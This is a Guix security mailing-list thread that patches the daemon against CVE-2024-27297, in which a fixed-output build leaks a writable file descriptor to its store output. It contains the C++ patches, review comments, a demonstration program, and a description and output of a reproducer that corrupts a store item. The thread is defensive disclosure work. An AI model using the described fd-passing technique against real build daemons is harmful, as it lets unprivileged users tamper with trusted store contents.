From: Ludovic Courtès
To: guix-patches@gnu.org
Subject: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297).
Date: Mon, 11 Mar 2024 11:54:00 +0100
Cc: Picnoir, Ludovic Courtès, Théophane Hufschmitt, guix-security@gnu.org

This fixes a security issue (CVE-2024-27297) whereby a fixed-output
derivation build process could open a writable file descriptor to its
output, send it to some outside process for instance over an abstract
AF_UNIX socket, which would then allow said process to modify the file
in the store after it has been marked as “valid”.

Nix security advisory:
https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37

* nix/libutil/util.cc (readDirectory): Add variants that take a DIR* and
a file descriptor.  Rewrite the ‘Path’ variant accordingly.
(copyFile, copyFileRecursively): New functions.
* nix/libutil/util.hh (copyFileRecursively): New declaration.
* nix/libstore/build.cc (DerivationGoal::buildDone): When ‘fixedOutput’
is true, call ‘copyFileRecursively’ followed by ‘rename’ on each output.
Change-Id: I7952d41093eed26e123e38c14a4c1424be1ce1c4

Reported-by: Picnoir, Théophane Hufschmitt
Change-Id: Idb5f2757f35af86b032a9851cecb19b70227bd88
---
 nix/libstore/build.cc |  16 ++++++
 nix/libutil/util.cc   | 112 ++++++++++++++++++++++++++++++++++++++++--
 nix/libutil/util.hh   |   6 +++
 3 files changed, 129 insertions(+), 5 deletions(-)

Hello,

On Friday, March 8th, fellow Nix developers Picnoir and Théophane
Hufschmitt contacted the Guix security team to let us know about a
security vulnerability in the Nix daemon they had just found and
addressed in Nix:

  advisory: https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37
  PoC: https://hackmd.io/03UGerewRcy3db44JQoWvw
  fix: https://github.com/NixOS/nix/commit/244f3eee0bbc7f11e9b383a15ed7368e2c4becc9

By sending a file descriptor to another process on the same machine, a
fixed-output derivation build process could give write access to a store
item to an unprivileged process, effectively giving an unprivileged user
the ability to corrupt that store item.

The fix implemented by Nix hackers is nice and simple: upon build
completion, the output is copied to a new location and deleted, such
that any file descriptors that might have been shared now point to
unlinked files.  (The PoC above looks at various other ways to fix the
problem, and this one is by far the simplest.)

The patch below “backports” the Nix fix to our daemon.  I ended up
having to implement my own ‘copyFileRecursively’ function, which is not
great (recent versions of Nix use C++17 ‘std::filesystem’ but we’re
stuck on C++11 and making the switch didn’t feel appealing either.)

I tested the patch locally with things like:

  strace -o log.strace -f ./test-env guix build -S guile-ssh
  strace -o log.strace -f ./test-env guix build -S guile-ssh --check
  strace -o log.strace -f ./test-env guix build -S hello

… looking at the strace output to make sure things were happening as
expected.  Also, “make check” passes.
We’d like to push it probably today, but we’d very much like to get more eyeballs on this code! Thanks again to Picnoir and Théophane! Ludo’. diff --git a/nix/libstore/build.cc b/nix/libstore/build.cc index 461fcbc584..e2adee118b 100644 --- a/nix/libstore/build.cc +++ b/nix/libstore/build.cc @@ -1382,6 +1382,22 @@ void DerivationGoal::buildDone() % drvPath % statusToString(status)); } + if (fixedOutput) { + /* Replace the output, if it exists, by a fresh copy of itself to + make sure that there's no stale file descriptor pointing to it + (CVE-2024-27297). */ + foreach (DerivationOutputs::iterator, i, drv.outputs) { + if (pathExists(i->second.path)) { + Path pivot = i->second.path + ".tmp"; + copyFileRecursively(i->second.path, pivot, true); + int err = rename(pivot.c_str(), i->second.path.c_str()); + if (err != 0) + throw SysError(format("renaming `%1%' to `%2%'") + % pivot % i->second.path); + } + } + } + /* Compute the FS closure of the outputs and register them as being valid. */ registerOutputs(); diff --git a/nix/libutil/util.cc b/nix/libutil/util.cc index 82eac72120..493f06f357 100644 --- a/nix/libutil/util.cc +++ b/nix/libutil/util.cc @@ -215,14 +215,11 @@ bool isLink(const Path & path) } -DirEntries readDirectory(const Path & path) +static DirEntries readDirectory(DIR *dir) { DirEntries entries; entries.reserve(64); - AutoCloseDir dir = opendir(path.c_str()); - if (!dir) throw SysError(format("opening directory `%1%'") % path); - struct dirent * dirent; while (errno = 0, dirent = readdir(dir)) { /* sic */ checkInterrupt(); 
@@ -230,11 +227,29 @@ DirEntries readDirectory(const Path & path) if (name == "." || name == "..") continue; entries.emplace_back(name, dirent->d_ino, dirent->d_type); } - if (errno) throw SysError(format("reading directory `%1%'") % path); + if (errno) throw SysError(format("reading directory")); return entries; } +DirEntries readDirectory(const Path & path) +{ + AutoCloseDir dir = opendir(path.c_str()); + if (!dir) throw SysError(format("opening directory `%1%'") % path); + return readDirectory(dir); +} + +static DirEntries readDirectory(int fd) +{ + /* Since 'closedir' closes the underlying file descriptor, duplicate FD + beforehand. */ + int fdcopy = dup(fd); + if (fdcopy < 0) throw SysError("dup"); + + AutoCloseDir dir = fdopendir(fdcopy); + if (!dir) throw SysError(format("opening directory from file descriptor `%1%'") % fd); + return readDirectory(dir); +} unsigned char getFileType(const Path & path) { 
@@ -364,6 +379,93 @@ void deletePath(const Path & path, unsigned long long & bytesFreed, size_t linkT _deletePath(path, bytesFreed, linkThreshold); } +static void copyFile(int sourceFd, int destinationFd) +{ + struct stat st; + if (fstat(sourceFd, &st) == -1) throw SysError("statting file"); + + ssize_t result = copy_file_range(sourceFd, NULL, destinationFd, NULL, st.st_size, 0); + if (result < 0 && errno == ENOSYS) { + for (size_t remaining = st.st_size; remaining > 0; ) { + unsigned char buf[8192]; + size_t count = std::min(remaining, sizeof buf); + + readFull(sourceFd, buf, count); + writeFull(destinationFd, buf, count); + remaining -= count; + } + } else { + if (result < 0) + throw SysError(format("copy_file_range `%1%' to `%2%'") % sourceFd % destinationFd); + if (result < st.st_size) + throw SysError(format("short write in copy_file_range `%1%' to `%2%'") + % sourceFd % destinationFd); + } +} + +static void copyFileRecursively(int sourceroot, const Path &source, + int destinationroot, const Path &destination, + bool deleteSource) +{ + struct stat st; + if (fstatat(sourceroot, source.c_str(), &st, AT_SYMLINK_NOFOLLOW) == -1) + throw SysError(format("statting file `%1%'") % source); + + if (S_ISREG(st.st_mode)) { + AutoCloseFD sourceFd = openat(sourceroot, source.c_str(), + O_CLOEXEC | O_NOFOLLOW | O_RDONLY); + if (sourceFd == -1) throw SysError(format("opening `%1%'") % source); + + AutoCloseFD destinationFd = openat(destinationroot, destination.c_str(), + O_CLOEXEC | O_CREAT | O_WRONLY | O_TRUNC, + st.st_mode); + if (destinationFd == -1) throw SysError(format("opening `%1%'") % source); + + copyFile(sourceFd, destinationFd); + } else if (S_ISLNK(st.st_mode)) { + char target[st.st_size + 1]; + ssize_t result = readlinkat(sourceroot, source.c_str(), target, st.st_size); + if (result != st.st_size) throw SysError("reading symlink target"); + target[st.st_size] = '\0'; + int err = symlinkat(target, destinationroot, destination.c_str()); + if (err != 0) + throw 
SysError(format("creating symlink `%1%'") % destination); + } else if (S_ISDIR(st.st_mode)) { + int err = mkdirat(destinationroot, destination.c_str(), 0755); + if (err != 0) + throw SysError(format("creating directory `%1%'") % destination); + + AutoCloseFD destinationFd = openat(destinationroot, destination.c_str(), + O_CLOEXEC | O_RDONLY | O_DIRECTORY); + if (err != 0) + throw SysError(format("opening directory `%1%'") % destination); + + AutoCloseFD sourceFd = openat(sourceroot, source.c_str(), + O_CLOEXEC | O_NOFOLLOW | O_RDONLY); + if (sourceFd == -1) + throw SysError(format("opening `%1%'") % source); + + if (deleteSource && !(st.st_mode & S_IWUSR)) { + /* Ensure the directory writable so files within it can be + deleted. */ + if (fchmod(sourceFd, st.st_mode | S_IWUSR) == -1) + throw SysError(format("making `%1%' directory writable") % source); + } + + for (auto & i : readDirectory(sourceFd)) + copyFileRecursively((int)sourceFd, i.name, (int)destinationFd, i.name, + deleteSource); + } else throw Error(format("refusing to copy irregular file `%1%'") % source); + + if (deleteSource) + unlinkat(sourceroot, source.c_str(), + S_ISDIR(st.st_mode) ? AT_REMOVEDIR : 0); +} + +void copyFileRecursively(const Path &source, const Path &destination, bool deleteSource) +{ + copyFileRecursively(AT_FDCWD, source, AT_FDCWD, destination, deleteSource); +} static Path tempName(Path tmpRoot, const Path & prefix, bool includePid, int & counter) diff --git a/nix/libutil/util.hh b/nix/libutil/util.hh index 880b0e93b2..058f5f8446 100644 --- a/nix/libutil/util.hh +++ b/nix/libutil/util.hh 
@@ -102,6 +102,12 @@ void deletePath(const Path & path); void deletePath(const Path & path, unsigned long long & bytesFreed, size_t linkThreshold = 1); +/* Copy SOURCE to DESTINATION, recursively. Throw if SOURCE contains a file + that is not a regular file, symlink, or directory. When DELETESOURCE is + true, delete source files once they have been copied. */ +void copyFileRecursively(const Path &source, const Path &destination, + bool deleteSource = false); + /* Create a temporary directory. */ Path createTempDir(const Path & tmpRoot = "", const Path & prefix = "nix", bool includePid = true, bool useGlobalCounter = true, mode_t mode = 0755); base-commit: c7836393be4d134861d652b2fcf09cf4e68275ca -- 2.41.0
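Review bot: in the build.cc hunk, the guard `if (pathExists(i->second.path))` makes the copy conditional on the output already sitting at its final store path when `buildDone` runs, which is before `registerOutputs()` is called. If any build mode stages outputs somewhere else and only moves them into the store inside `registerOutputs` (a chroot build would), the condition is false there and the descriptor-detaching copy is silently skipped, so the check and copy should operate on the location the output actually occupies at this point, or be moved next to that move in `registerOutputs`. Two smaller points: `Path pivot = i->second.path + ".tmp"` is never cleaned up if an earlier attempt was interrupted between the copy and the `rename`, and a stale pivot directory then makes the `mkdirat` in `copyFileRecursively` fail with EEXIST, so delete it first if it exists; and the comment would be stronger if it said that the fixed-output hash check in `registerOutputs` is subsequently performed on the fresh copy, which is what makes copy-then-verify the right order.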
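Review bot: in the first util.cc hunk, the rewritten error path `throw SysError(format("reading directory"))` drops the directory name that the removed line reported, so failures coming through the new fd-based caller are harder to diagnose; consider passing a description into `readDirectory(DIR *)`, or catching and rethrowing in the two wrappers so the message still names the path or the descriptor number.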
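Review bot: in `readDirectory(int fd)` (second util.cc hunk), `dup(fd)` produces a descriptor without `O_CLOEXEC`, and if `fdopendir(fdcopy)` fails the duplicate is leaked because `AutoCloseDir` ends up holding a null `DIR *`; use `fcntl(fd, F_DUPFD_CLOEXEC, 0)` and `close(fdcopy)` on the failure branch. For a daemon whose fix is about descriptors that outlive their intended scope, leaking a store directory fd across a later `fork`/`exec` is worth avoiding. A comment would also help: the duplicate shares its file offset with `fd`, so the `readdir` loop advances the caller's descriptor as well; harmless here because callers only use it as the directory argument to `openat`.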
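Review bot: in the `S_ISDIR` branch of `copyFileRecursively` (third util.cc hunk), the check following `AutoCloseFD destinationFd = openat(destinationroot, destination.c_str(), O_CLOEXEC | O_RDONLY | O_DIRECTORY);` tests `err != 0`, the `mkdirat` result already known to be zero, instead of `destinationFd == -1`, so a failed open goes undetected and the recursion continues with `-1` as its destination root, failing later with EBADF and a misleading message; change it to `if (destinationFd == -1)`. Related: in the `S_ISREG` branch the error for the destination `openat` formats `% source` where it should be `% destination`. In `copyFile`, `copy_file_range` may legitimately return fewer bytes than requested, so `result < st.st_size` should loop on the remainder rather than throw "short write", and the read/write fallback is taken only on ENOSYS, leaving EXDEV or EINVAL from older kernels and some filesystems as hard failures. Finally, the `unlinkat` return value at the end is ignored and `mkdirat(..., 0755)` discards the source directory's mode bits; both are acceptable only if the caller canonicalises the result afterwards, which deserves a comment.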
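Review bot: the header comment for `copyFileRecursively` in the util.hh hunk should state two behaviours a caller needs to know: the operation is not atomic (a failure midway leaves a partial DESTINATION and, with DELETESOURCE, a partially deleted SOURCE), and source deletion is best-effort since the implementation does not check the result of `unlinkat`.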
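An added example, not from the patch or the Guix tree, that models for one regular file the copy-unlink-rename step the cover letter describes and lets you check its effect: a descriptor retained from before finalisation no longer reaches the content at the path. The scratch directory under /tmp and the strings written are constructed for the demonstration.

```cpp
// Added example (not part of the Guix patch): a single-file model of the
// copy-unlink-rename step performed on each fixed-output output, showing
// why a stale writable descriptor stops mattering once the path is pivoted.
#include <cerrno>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <stdexcept>
#include <string>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

// Read the whole regular file at PATH; returns "" if it cannot be opened.
static std::string readWholeFile(const std::string &path)
{
    std::string out;
    int fd = open(path.c_str(), O_RDONLY | O_CLOEXEC);
    if (fd < 0) return out;
    char buf[4096];
    ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) out.append(buf, (size_t) n);
    close(fd);
    return out;
}

// Same control flow as the patch for one regular file: copy SRC into a
// fresh inode at SRC + ".tmp", unlink SRC, rename the copy over SRC.
// Descriptors opened on the old inode keep pointing at the unlinked file.
static void pivotCopy(const std::string &src)
{
    std::string pivot = src + ".tmp";
    int in = open(src.c_str(), O_RDONLY | O_CLOEXEC | O_NOFOLLOW);
    if (in < 0) throw std::runtime_error(std::string("opening source: ") + strerror(errno));
    struct stat st;
    if (fstat(in, &st) != 0) { close(in); throw std::runtime_error("fstat"); }
    int out = open(pivot.c_str(), O_WRONLY | O_CREAT | O_TRUNC | O_CLOEXEC,
                   st.st_mode & 0777);
    if (out < 0) { close(in); throw std::runtime_error("opening pivot"); }
    char buf[8192];
    ssize_t n;
    while ((n = read(in, buf, sizeof buf)) > 0) {
        // Handle short writes explicitly instead of assuming one write() suffices.
        for (ssize_t done = 0; done < n; ) {
            ssize_t w = write(out, buf + done, (size_t) (n - done));
            if (w < 0) { close(in); close(out); throw std::runtime_error("write"); }
            done += w;
        }
    }
    close(in);
    close(out);
    if (n < 0) throw std::runtime_error("read");
    if (unlink(src.c_str()) != 0) throw std::runtime_error("unlink");
    if (rename(pivot.c_str(), src.c_str()) != 0) throw std::runtime_error("rename");
}

// Model of the window the patch closes.  A "builder" writes its output and
// keeps a writable descriptor to it; the "daemon" then finalises the path
// (with or without the pivot copy); afterwards the retained descriptor is
// used to write again.  Returns true when the content at the path is
// unaffected by that late write, i.e. the descriptor was detached.
static bool lateWriteIsIsolated(bool applyPivotCopy)
{
    char tmpl[] = "/tmp/fd-escape-demo-XXXXXX";   // constructed scratch dir
    char *dir = mkdtemp(tmpl);
    if (!dir) throw std::runtime_error("mkdtemp");
    std::string output = std::string(dir) + "/output";

    int held = open(output.c_str(), O_RDWR | O_CREAT | O_CLOEXEC, 0644);
    if (held < 0) throw std::runtime_error("creating output");
    const char good[] = "expected content";
    if (write(held, good, sizeof good - 1) != (ssize_t) (sizeof good - 1))
        throw std::runtime_error("initial write");

    if (applyPivotCopy) pivotCopy(output);  // the daemon-side fix

    // Late write through the descriptor retained from before finalisation.
    const char late[] = "changed after validation";
    (void) pwrite(held, late, sizeof late - 1, 0);
    close(held);

    std::string seen = readWholeFile(output);
    unlink(output.c_str());
    rmdir(dir);
    return seen == good;
}

int main()
{
    std::printf("without pivot copy, late write visible at path: %s\n",
                lateWriteIsIsolated(false) ? "no" : "yes");
    std::printf("with pivot copy,    late write visible at path: %s\n",
                lateWriteIsIsolated(true) ? "no" : "yes");
    return 0;
}
```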
Date: Mon, 11 Mar 2024 16:03:45 +0100
Message-Id: <87edcgq08e.fsf@gnu.org>
To: control@debbugs.gnu.org
From: Ludovic Courtès
Subject: control message for bug #69728

tags 69728 + security
quit
From: Ludovic Courtès
To: 69728@debbugs.gnu.org
Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297).
Date: Mon, 11 Mar 2024 23:16:31 +0100
Message-ID: <87frwwo1mo.fsf@gnu.org>
Cc: Picnoir, Théophane Hufschmitt, guix-security@gnu.org

Ludovic Courtès skribis:

> This fixes a security issue (CVE-2024-27297) whereby a fixed-output
> derivation build process could open a writable file descriptor to its
> output, send it to some outside process for instance over an abstract
> AF_UNIX socket, which would then allow said process to modify the file
> in the store after it has been marked as “valid”.
>
> Nix security advisory:
> https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37
>
> * nix/libutil/util.cc (readDirectory): Add variants that take a DIR* and
> a file descriptor.  Rewrite the ‘Path’ variant accordingly.
> (copyFile, copyFileRecursively): New functions.
> * nix/libutil/util.hh (copyFileRecursively): New declaration.
> * nix/libstore/build.cc (DerivationGoal::buildDone): When ‘fixedOutput’
> is true, call ‘copyFileRecursively’ followed by ‘rename’ on each output.
>
> Change-Id: I7952d41093eed26e123e38c14a4c1424be1ce1c4
>
> Reported-by: Picnoir, Théophane Hufschmitt
> Change-Id: Idb5f2757f35af86b032a9851cecb19b70227bd88
> ---
>  nix/libstore/build.cc |  16 ++++++
>  nix/libutil/util.cc   | 112 ++++++++++++++++++++++++++++++++++++++++--
>  nix/libutil/util.hh   |   6 +++
>  3 files changed, 129 insertions(+), 5 deletions(-)

Pushed (with a slightly different commit message) as
8f4ffb3fae133bb21d7991e97c2f19a7108b1143.

Updated the ‘guix’ package in b8954a7faeccae11c32add7cd0f408d139af3a43:
Guix System users can now reconfigure!

Added a news entry in 4003c60abf7a6e59e47cc2deb9eef2f104ebb994.

Ludo’.

Date: Tue, 12 Mar 2024 00:42:58 +0000
To: Ludovic Courtès
From: John Kehayias
Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297).
Message-ID: <87o7bk2sc6.fsf@protonmail.com>
In-Reply-To: <87frwwo1mo.fsf@gnu.org>
Cc: Picnoir, guix-security@gnu.org, Théophane Hufschmitt, 69728@debbugs.gnu.org

Hi all,

On Mon, Mar 11, 2024 at 11:16 PM, Ludovic Courtès wrote:

> Ludovic Courtès skribis:
>
>> This fixes a security issue (CVE-2024-27297) whereby a fixed-output
>> derivation build process could open a writable file descriptor to its
>> output, send it to some outside process for instance over an abstract
>> AF_UNIX socket, which would then allow said process to modify the file
>> in the store after it has been marked as “valid”.
>>
>> Nix security advisory:
>> https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37
>>
>> * nix/libutil/util.cc (readDirectory): Add variants that take a DIR* and
>> a file descriptor.  Rewrite the ‘Path’ variant accordingly.
>> (copyFile, copyFileRecursively): New functions.
>> * nix/libutil/util.hh (copyFileRecursively): New declaration.
>> * nix/libstore/build.cc (DerivationGoal::buildDone): When ‘fixedOutput’
>> is true, call ‘copyFileRecursively’ followed by ‘rename’ on each output.
>>
>> Change-Id: I7952d41093eed26e123e38c14a4c1424be1ce1c4
>>
>> Reported-by: Picnoir, Théophane
>> Hufschmitt
>> Change-Id: Idb5f2757f35af86b032a9851cecb19b70227bd88
>> ---
>>  nix/libstore/build.cc |  16 ++++++
>>  nix/libutil/util.cc   | 112 ++++++++++++++++++++++++++++++++++++++++--
>>  nix/libutil/util.hh   |   6 +++
>>  3 files changed, 129 insertions(+), 5 deletions(-)
>
> Pushed (with a slightly different commit message) as
> 8f4ffb3fae133bb21d7991e97c2f19a7108b1143.
>
> Updated the ‘guix’ package in b8954a7faeccae11c32add7cd0f408d139af3a43:
> Guix System users can now reconfigure!
>
> Added a news entry in 4003c60abf7a6e59e47cc2deb9eef2f104ebb994.
>
> Ludo’.

Many thanks for the quick fix, deployment, and news entry!

I've attached a draft of a blog post to add some information and further
alert users.  Please give it a read and feel free to make any changes or
corrections.  Especially if I misunderstood or glossed too quickly over
any technical aspects, though I kept it light.  And, if all looks good,
feel free to take whatever steps to post this to the website.

Two minor questions/comments:

1. I made a note that presumably there is some performance penalty for
copying everything, probably for derivations with many files.  But I
haven't tested this, just picked up on this from what was said on the
Nix side as a potential impact.

2. Is picnoir the same as Félix Baylac Jacqué?  I wasn't sure based on
emails; fine to change to whatever they want for credit for reporting
this to us.  Based on what was posted on the Nix side, it seems jade and
puckipedia are the original finders/reporters of the security issue.
But feel free to correct me.

Thanks everyone!
John

Content-Disposition: attachment; filename=cve-2024-27297-post.md
From: Ludovic Courtès
To: 69728@debbugs.gnu.org
Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297).
In-Reply-To: <87frwwo1mo.fsf@gnu.org> (Ludovic Courtès's message of "Mon, 11 Mar 2024 23:16:31 +0100")
Date: Tue, 12 Mar 2024 14:31:00 +0100
Message-ID: <87ttlblgq3.fsf_-_@gnu.org>
Cc: Picnoir, Théophane Hufschmitt, guix-security@gnu.org

Hello,

Ludovic Courtès wrote:

> Pushed (with a slightly different commit message) as
> 8f4ffb3fae133bb21d7991e97c2f19a7108b1143.
>
> Updated the ‘guix’ package in b8954a7faeccae11c32add7cd0f408d139af3a43:
> Guix System users can now reconfigure!
>
> Added a news entry in 4003c60abf7a6e59e47cc2deb9eef2f104ebb994.

It turns out that the previous fix was incomplete due to a mistake of
mine. I pushed ff1251de0bc327ec478fc66a562430fbf35aef42 to address
that (patch attached for clarity).

Commit 30a8de0bcdadfb55cbcaa34760527c1b767808c7 updates the ‘guix’
package again.

Now is the time to reconfigure. I’ll send a reproducer in a separate
message.

Apologies for the mishap.

Ludo’.
commit ff1251de0bc327ec478fc66a562430fbf35aef42
Author: Ludovic Courtès
Date:   Tue Mar 12 11:53:35 2024 +0100

    daemon: Address shortcoming in previous security fix for CVE-2024-27297.

    This is a followup to 8f4ffb3fae133bb21d7991e97c2f19a7108b1143.

    Commit 8f4ffb3fae133bb21d7991e97c2f19a7108b1143 fell short in two ways:
    (1) it didn’t have any effect for fixed-output derivations performed in
    a chroot, which is the case for all of them except those using
    “builtin:download” and “builtin:git-download”, and (2) it did not
    preserve ownership when copying, leading to “suspicious ownership or
    permission […] rejecting this build output” errors.

    * nix/libstore/build.cc (DerivationGoal::buildDone): Account for
    ‘chrootRootDir’ when copying ‘drv.outputs’.
    * nix/libutil/util.cc (copyFileRecursively): Add ‘fchown’ and
    ‘fchownat’ calls to preserve file ownership; this is necessary for
    chrooted fixed-output derivation builds.
    * nix/libutil/util.hh: Update comment.

    Change-Id: Ib59f040e98fed59d1af81d724b874b592cbef156

diff --git a/nix/libstore/build.cc b/nix/libstore/build.cc
index e2adee118b..d23c0944a4 100644
--- a/nix/libstore/build.cc
+++ b/nix/libstore/build.cc
@@ -1387,13 +1387,14 @@ void DerivationGoal::buildDone() make sure that there's no stale file descriptor pointing to= it (CVE-2024-27297). */ foreach (DerivationOutputs::iterator, i, drv.outputs) { - if (pathExists(i->second.path)) { - Path pivot =3D i->second.path + ".tmp"; - copyFileRecursively(i->second.path, pivot, true); - int err =3D rename(pivot.c_str(), i->second.path.c_str()); + Path output =3D chrootRootDir + i->second.path; + if (pathExists(output)) { + Path pivot =3D output + ".tmp"; + copyFileRecursively(output, pivot, true); + int err =3D rename(pivot.c_str(), output.c_str()); if (err !=3D 0) throw SysError(format("renaming `%1%' to `%2%'") - % pivot % i->second.path); + % pivot % output); } } } diff --git a/nix/libutil/util.cc b/nix/libutil/util.cc index 493f06f357..578d657293 100644 --- a/nix/libutil/util.cc +++ b/nix/libutil/util.cc @@ -422,6 +422,7 @@ static void copyFileRecursively(int sourceroot, const P= ath &source, if (destinationFd =3D=3D -1) throw SysError(format("opening `%1%'") % sou= rce); =20 copyFile(sourceFd, destinationFd); + fchown(destinationFd, st.st_uid, st.st_gid); } else if (S_ISLNK(st.st_mode)) { char target[st.st_size + 1]; ssize_t result =3D readlinkat(sourceroot, source.c_str(), target, st.st_s= ize); @@ -430,6 +431,8 @@ static void copyFileRecursively(int sourceroot, const P= ath &source, int err =3D symlinkat(target, destinationroot, destination.c_str()); if (err !=3D 0) throw SysError(format("creating symlink `%1%'") % destination); + fchownat(destinationroot, destination.c_str(), + st.st_uid, st.st_gid, AT_SYMLINK_NOFOLLOW); } else if (S_ISDIR(st.st_mode)) { int err =3D mkdirat(destinationroot, destination.c_str(), 0755); if (err !=3D 0) 
@@ -455,6 +458,7 @@ static void copyFileRecursively(int sourceroot, const P= ath &source, for (auto & i : readDirectory(sourceFd)) copyFileRecursively((int)sourceFd, i.name, (int)destinationFd, i.name, deleteSource); + fchown(destinationFd, st.st_uid, st.st_gid); } else throw Error(format("refusing to copy irregular file `%1%'") % s= ource); =20 if (deleteSource) diff --git a/nix/libutil/util.hh b/nix/libutil/util.hh index 058f5f8446..377aac0684 100644 --- a/nix/libutil/util.hh +++ b/nix/libutil/util.hh 
@@ -102,9 +102,10 @@ void deletePath(const Path & path); void deletePath(const Path & path, unsigned long long & bytesFreed, size_t linkThreshold =3D 1); =20 -/* Copy SOURCE to DESTINATION, recursively. Throw if SOURCE contains a fi= le - that is not a regular file, symlink, or directory. When DELETESOURCE is - true, delete source files once they have been copied. */ +/* Copy SOURCE to DESTINATION, recursively, preserving ownership. Throw if + SOURCE contains a file that is not a regular file, symlink, or director= y. + When DELETESOURCE is true, delete source files once they have been + copied. */ void copyFileRecursively(const Path &source, const Path &destination, bool deleteSource =3D false); =20 --=-=-=--
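Review bot: In the build.cc hunk the pivot path `Path pivot = output + ".tmp";` is a predictable sibling of the output and is passed straight to `copyFileRecursively(output, pivot, true)` without first checking that nothing already exists there; since `copyFileRecursively`'s behaviour on a pre-existing destination is not visible in this patch, a stale or builder-created `.tmp` entry could end up being what `rename(pivot.c_str(), output.c_str())` moves into place. Suggest throwing a `SysError` when `pathExists(pivot)` before the copy, so only a freshly created pivot is ever renamed over the output.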
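Review bot: In both util.cc hunks the return values of the new `fchown(destinationFd, st.st_uid, st.st_gid);` calls (regular file at -422, directory at -455) and of `fchownat(destinationroot, destination.c_str(), st.st_uid, st.st_gid, AT_SYMLINK_NOFOLLOW);` are discarded, unlike the neighbouring `symlinkat` and `mkdirat` calls which throw `SysError` on failure. The commit message says ownership preservation is what keeps chrooted fixed-output builds from being rejected with "suspicious ownership or permission", so a silently failed chown would surface later as exactly that rejection; suggest `if (fchown(destinationFd, st.st_uid, st.st_gid) == -1) throw SysError(format("changing ownership of `%1%'") % destination);` and the same for `fchownat`.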
From: Ludovic Courtès
To: 69728@debbugs.gnu.org
Subject: Reproducer for the daemon fixed-output derivation vulnerability
In-Reply-To: <87frwwo1mo.fsf@gnu.org> (Ludovic Courtès's message of "Mon, 11 Mar 2024 23:16:31 +0100")
Date: Tue, 12 Mar 2024 14:45:56 +0100
Message-ID: <871q8flg17.fsf_-_@gnu.org>
Cc: Picnoir, Théophane Hufschmitt, guix-security@gnu.org

As promised, attached is a reproducer that I adapted from the Nix one
at , which I think was written by puck .

The program demonstrates the vulnerability using two fixed-output
derivations that must be built concurrently on the same machine. To do
that, run:

  guix build -f fixed-output-derivation-corruption.scm -M4

Normally, you’ll find yourself building
“derivation-that-exfiltrates-fd.drv” and “derivation-that-grabs-fd.drv”
in parallel; the former will send a file descriptor to the latter using
a C program, and the latter will use that file descriptor to modify the
contents of /gnu/store/…-derivation-that-exfiltrates-fd after it has
completed.
On a safe system, the ‘guix build’ command succeeds like this:

--8<---------------cut here---------------start------------->8---
$ guix build -f fixed-output-derivation-corruption.scm -M4
/home/ludo/src/guix-debugging/fixed-output-derivation-corruption.scm:20:7: warning: importing module (guix config) from the host
/home/ludo/src/guix-debugging/fixed-output-derivation-corruption.scm:20:7: warning: importing module (guix config) from the host
substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0%
substitute: updating substitutes from 'https://bordeaux.guix.gnu.org'... 100.0%
The following derivations will be built:
  /gnu/store/gwjb6hinjnnxlrrjxxvwa0n7gxyzlb5l-checking-for-vulnerability.drv
  /gnu/store/8wf8mpn0syy5yay3nbrzr3w53jd925rc-derivation-that-grabs-fd-65f05a81-17185.drv
  /gnu/store/a4jabck4l27y4nfjd2agq4m9vp7whqrz-derivation-that-exfiltrates-fd-65f05a81-17185.drv
building /gnu/store/a4jabck4l27y4nfjd2agq4m9vp7whqrz-derivation-that-exfiltrates-fd-65f05a81-17185.drv...
building /gnu/store/8wf8mpn0syy5yay3nbrzr3w53jd925rc-derivation-that-grabs-fd-65f05a81-17185.drv...
accepting connections...
attempting connection...
preparing our hand...
successfully built /gnu/store/a4jabck4l27y4nfjd2agq4m9vp7whqrz-derivation-that-exfiltrates-fd-65f05a81-17185.drv
The following build is still in progress:
  /gnu/store/8wf8mpn0syy5yay3nbrzr3w53jd925rc-derivation-that-grabs-fd-65f05a81-17185.drv
swaptrick finished, now to wait..
successfully built /gnu/store/8wf8mpn0syy5yay3nbrzr3w53jd925rc-derivation-that-grabs-fd-65f05a81-17185.drv
building /gnu/store/gwjb6hinjnnxlrrjxxvwa0n7gxyzlb5l-checking-for-vulnerability.drv...
This depends on /gnu/store/b03pq9ns0y7l12c08wy9jc8lbmkmy33j-derivation-that-grabs-fd-65f05a81-17185, which will grab the file descriptor and corrupt /gnu/store/i0qcxrhmckni6snn1angzi54pxx3fm1k-derivation-that-exfiltrates-fd-65f05a81-17185.

Here is what we see in /gnu/store/i0qcxrhmckni6snn1angzi54pxx3fm1k-derivation-that-exfiltrates-fd-65f05a81-17185: "This is the original text, before corruption."

Failed to corrupt /gnu/store/i0qcxrhmckni6snn1angzi54pxx3fm1k-derivation-that-exfiltrates-fd-65f05a81-17185, your system is safe.
successfully built /gnu/store/gwjb6hinjnnxlrrjxxvwa0n7gxyzlb5l-checking-for-vulnerability.drv
/gnu/store/5xsvwbld5c5zxi075j45sfnvsx9f658v-checking-for-vulnerability
--8<---------------cut here---------------end--------------->8---

On a system that is still vulnerable, we get this instead:

--8<---------------cut here---------------start------------->8---
$ guix build -f fixed-output-derivation-corruption.scm -M4
/home/ludo/src/guix-debugging/fixed-output-derivation-corruption.scm:20:7: warning: importing module (guix config) from the host
/home/ludo/src/guix-debugging/fixed-output-derivation-corruption.scm:20:7: warning: importing module (guix config) from the host
substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0%
substitute: updating substitutes from 'https://bordeaux.guix.gnu.org'... 100.0%
substitute: updating substitutes from 'https://guix.bordeaux.inria.fr'... 100.0%
The following derivations will be built:
  /gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulnerability.drv
  /gnu/store/a2xmgshnyqw7dafnmhdsjxr6f1qqa9da-derivation-that-exfiltrates-fd-65f05aca-17261.drv
  /gnu/store/arw3as4x4i61xg3yvfk9lsa9jcrwlpqb-derivation-that-grabs-fd-65f05aca-17261.drv
